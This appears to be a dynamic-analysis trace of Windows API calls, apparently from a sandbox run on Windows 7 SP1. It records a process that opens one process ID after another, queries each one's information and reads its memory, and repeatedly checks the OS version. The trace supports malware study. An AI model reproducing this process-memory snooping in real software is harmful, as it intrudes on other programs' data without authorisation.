[0403.085] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.085] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x512970, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.085] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5126f0, lpBuffer=0x12dd100, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.087] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.088] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.088] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.088] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x511ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.088] malloc (_Size=0x8a) returned 0x2c4740
[0403.088] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x512772, lpBuffer=0x2c4740, nSize=0x88, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.089] free (_Block=0x2c4740)
[0403.090] CloseHandle (hObject=0x240) returned 1
[0403.129] _ui64tow (_Value=0x990, _Buffer="2440", _Radix=10) returned="2448"
[0403.134] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2448") returned 4
[0403.135] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x3ff, dwBuildNumber=0x0, dwPlatformId=0x128260, szCSDVersion="") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.135] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.159] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x990) returned 0x240
[0403.159] GetLastError () returned 0x0
[0403.159] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.159] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.160] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.160] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x322930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.160] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3226e6, lpBuffer=0x12dd100, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.161] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.163] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.163] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.163] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x321ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.163] malloc (_Size=0x7a) returned 0x2c4740
[0403.163] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x322758, lpBuffer=0x2c4740, nSize=0x78, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.163] free (_Block=0x2c4740)
[0403.164] CloseHandle (hObject=0x240) returned 1
[0403.166] _ui64tow (_Value=0x998, _Buffer="2448", _Radix=10) returned="2456"
[0403.170] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2456") returned 4
[0403.172] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.172] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.198] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x998) returned 0x240
[0403.198] GetLastError () returned 0x0
[0403.198] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.198] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.198] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.198] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4e2960, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.199] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4e26e6, lpBuffer=0x12dd100, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.200] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.201] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.201] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.201] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4e1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.201] malloc (_Size=0x8a) returned 0x2c4740
[0403.201] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4e2768, lpBuffer=0x2c4740, nSize=0x88, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.201] free (_Block=0x2c4740)
[0403.202] CloseHandle (hObject=0x240) returned 1
[0403.203] _ui64tow (_Value=0x9a0, _Buffer="2456", _Radix=10) returned="2464"
[0403.207] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2464") returned 4
[0403.209] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.209] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.236] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a0) returned 0x240
[0403.236] GetLastError () returned 0x0
[0403.236] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.236] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.237] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.237] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xb28f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.237] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xb26e0, lpBuffer=0x12dd100, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.239] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.240] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.240] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.240] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xb1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.240] malloc (_Size=0x66) returned 0x2c08e0
[0403.240] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xb273e, lpBuffer=0x2c08e0, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c08e0*, lpNumberOfBytesRead=0x0) returned 1
[0403.241] free (_Block=0x2c08e0)
[0403.242] CloseHandle (hObject=0x240) returned 1
[0403.243] _ui64tow (_Value=0x9a8, _Buffer="2464", _Radix=10) returned="2472"
[0403.251] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2472") returned 4
[0403.252] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.252] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.275] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a8) returned 0x240
[0403.275] GetLastError () returned 0x0
[0403.275] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.275] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.275] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.276] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b2970, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.276] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b26fc, lpBuffer=0x12dd100, nSize=0x80, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.277] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.282] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.282] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.283] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.283] malloc (_Size=0x88) returned 0x2c4740
[0403.283] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b277c, lpBuffer=0x2c4740, nSize=0x86, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.283] free (_Block=0x2c4740)
[0403.284] CloseHandle (hObject=0x240) returned 1
[0403.285] _ui64tow (_Value=0x9b0, _Buffer="2472", _Radix=10) returned="2480"
[0403.289] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2480") returned 4
[0403.291] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.291] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.316] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b0) returned 0x240
[0403.316] GetLastError () returned 0x0
[0403.316] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.316] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.316] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.317] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4a2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.317] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4a26f2, lpBuffer=0x12dd100, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.318] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.320] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.320] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.320] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4a1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.323] malloc (_Size=0x76) returned 0x2c4740
[0403.323] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4a2760, lpBuffer=0x2c4740, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.323] free (_Block=0x2c4740)
[0403.324] CloseHandle (hObject=0x240) returned 1
[0403.325] _ui64tow (_Value=0x9b8, _Buffer="2480", _Radix=10) returned="2488"
[0403.333] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2488") returned 4
[0403.334] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.334] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.361] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b8) returned 0x240
[0403.361] GetLastError () returned 0x0
[0403.361] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.361] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.361] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.361] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4a2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.362] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4a26f0, lpBuffer=0x12dd100, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.363] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.364] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.364] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.364] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4a1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.364] malloc (_Size=0x76) returned 0x2c4740
[0403.364] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4a275e, lpBuffer=0x2c4740, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.365] free (_Block=0x2c4740)
[0403.366] CloseHandle (hObject=0x240) returned 1
[0403.367] _ui64tow (_Value=0x9dc, _Buffer="2488", _Radix=10) returned="2524"
[0403.372] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2524") returned 4
[0403.373] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.373] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.395] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9dc) returned 0x240
[0403.395] GetLastError () returned 0x0
[0403.395] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.395] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.396] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.396] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3b2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.396] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3b26e8, lpBuffer=0x12dd100, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.397] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.398] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.399] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.399] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.399] malloc (_Size=0x76) returned 0x2c4740
[0403.399] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3b2756, lpBuffer=0x2c4740, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.399] free (_Block=0x2c4740)
[0403.400] CloseHandle (hObject=0x240) returned 1
[0403.401] _ui64tow (_Value=0x9e8, _Buffer="2524", _Radix=10) returned="2536"
[0403.406] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2536") returned 4
[0403.407] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.407] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.435] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e8) returned 0x240
[0403.435] GetLastError () returned 0x0
[0403.435] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.435] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.436] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
